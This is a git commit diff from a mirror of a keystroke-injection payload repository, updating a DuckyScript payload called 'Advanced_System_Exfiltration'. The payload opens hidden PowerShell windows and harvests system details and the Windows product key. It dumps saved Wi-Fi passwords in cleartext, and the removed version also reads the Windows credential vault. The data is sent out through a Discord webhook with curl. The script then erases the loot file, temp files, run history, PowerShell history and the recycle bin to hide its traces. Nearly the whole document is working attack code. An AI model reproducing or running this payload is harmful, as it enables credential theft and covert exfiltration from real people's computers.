mirror of https://github.com/hak5/omg-payloads.git
Update A.S.E - Advanced_System_Exfiltration
LulzAnarchyAnon
GitHub
parent
f4d54cfebe
commit
8f59a85d7a
|
|
@ -1,437 +1,155 @@
|
|||
REM Title: A.S.E - Advanced_System_Exfiltration
|
||||
REM Author: LulzAnarchyAnon
|
||||
REM Description: This slow, and steady staged payload takes it's time and gleans detailed system information using
|
||||
REM powershell, Ducky script and notepad. First hidden powershells are opened in stages, and payloads are deployed to
|
||||
REM collect the target computers system information, Then a notepad.txt file named loot is created with all
|
||||
REM the gleaned information, and hidden in the Public Users folder C:\Users\Public\loot.txt The loot is then
|
||||
REM exfiltrated using a Discord webhook. In the final stage of the payload the loot.txt file, the recycling bin
|
||||
REM contents, the temp folder contents and powershell history are all deleted.
|
||||
REM Description: This payload gleans detailed system information from the target system using powershell, ducky
|
||||
REM and notepad. First a hidden powershell is opened, and a payload is deployed to collect the target computers
|
||||
REM system information. Then a notepad file named loot is created with all the gleaned information, and hidden in
|
||||
REM the public Users folder C:\Users\Public\loot.txt of the target system. The loot is then exfiltrated using a
|
||||
REM Discord webhook. In the final stage of the payload the loot.txt file, the recycling bin contents, the temp
|
||||
REM folder contents and powershell history are all deleted.
|
||||
REM Target: Windows 10 & 11
|
||||
REM Props: iamjakoby, HAK5 and a huge shout out to O.MG!!!
|
||||
REM Version: 1.0
|
||||
REM Version: 3.0
|
||||
REM Category: Exfiltration
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-CimInstance -ClassName Win32_ComputerSystem
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING systeminfo |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-CimInstance -ClassName SoftwareLicensingService | Select-Object -ExpandProperty OA3xOriginalProductKey |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $networkAdapters | Select-Object Name, MACAddress, Speed |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $networkAdapters = Get-CimInstance -ClassName CIM_NetworkAdapter |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $diskDrives = Get-CimInstance -ClassName CIM_DiskDrive |
|
||||
DELAY 200
|
||||
STRING Get-CimInstance -ClassName SoftwareLicensingService | Select-Object -ExpandProperty OA3xOriginalProductKey | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING $os = Get-CimInstance -ClassName CIM_OperatingSystem |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-NetIPAddress |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-DnsClient |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-CimInstance -ClassName SoftwareLicensingService | Select-Object -ExpandProperty OA3xOriginalProductKey |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING
|
||||
STRING [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
|
||||
ENTER
|
||||
STRING $vault = New-Object Windows.Security.Credentials.PasswordVault
|
||||
ENTER
|
||||
STRING $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } |
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-ComputerInfo |
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 2000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
STRING Get-CimInstance -ClassName Win32_ComputerSystem | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType=3"
|
||||
DELAY 5000
|
||||
DELAY 2000
|
||||
STRING systeminfo | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
STRING Get-DnsClient | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING Get-ComputerInfo | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | Format-Table -AutoSize | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-CimInstance -ClassName Win32_BIOS
|
||||
DELAY 5000
|
||||
DELAY 2000
|
||||
STRING Get-CimInstance -ClassName Win32_LogicalDisk -Filter "DriveType=3" | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
STRING Get-CimInstance -ClassName Win32_BIOS | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING Get-CimInstance -ClassName Win32_Processor | Select-Object -ExcludeProperty "CIM*" | Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING Get-CimInstance -ClassName Win32_Processor | Select-Object -ExcludeProperty "CIM*"
|
||||
DELAY 5000
|
||||
ENTER
|
||||
DELAY 5000
|
||||
STRING Out-File C:\Users\Public\loot.txt -Force -append
|
||||
DELAY 500
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING function Upload-Discord {
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING [CmdletBinding()]
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING param (
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING [parameter(Position=0,Mandatory=$False)]
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING [string]$file,
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING [parameter(Position=1,Mandatory=$False)]
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING [string]$text
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING )
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING $hookurl = 'YOUR DISCORD WEBHOOK HERE'
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING $Body = @{
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING 'username' = $env:"YOUR DISCORD USERNAME HERE"
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING 'content' = $text
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING }
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING if (-not ([string]::IsNullOrEmpty($text))){
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING curl.exe -F "file1=@$file" $hookurl
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING }
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
STRING Upload-Discord -file "C:\Users\Public\loot.txt"
|
||||
DELAY 200
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING exit
|
||||
ENTER
|
||||
DELAY 1000
|
||||
|
||||
GUI r
|
||||
DELAY 200
|
||||
STRING powershell -windowstyle hidden
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
STRING Remove-Item "C:\Users\Public\loot.txt"
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
STRING Remove-Item (Get-PSreadlineOption).HistorySavePath
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
ENTER
|
||||
DELAY 500
|
||||
DELAY 2000
|
||||
STRING Clear-RecycleBin -Force -ErrorAction SilentlyContinue
|
||||
DELAY 500
|
||||
DELAY 200
|
||||
ENTER
|
||||
DELAY 500
|
||||
DELAY 200
|
||||
STRING exit
|
||||
DELAY 200
|
||||
ENTER
|
||||
|
|
|
|||
Loading…
Reference in New Issue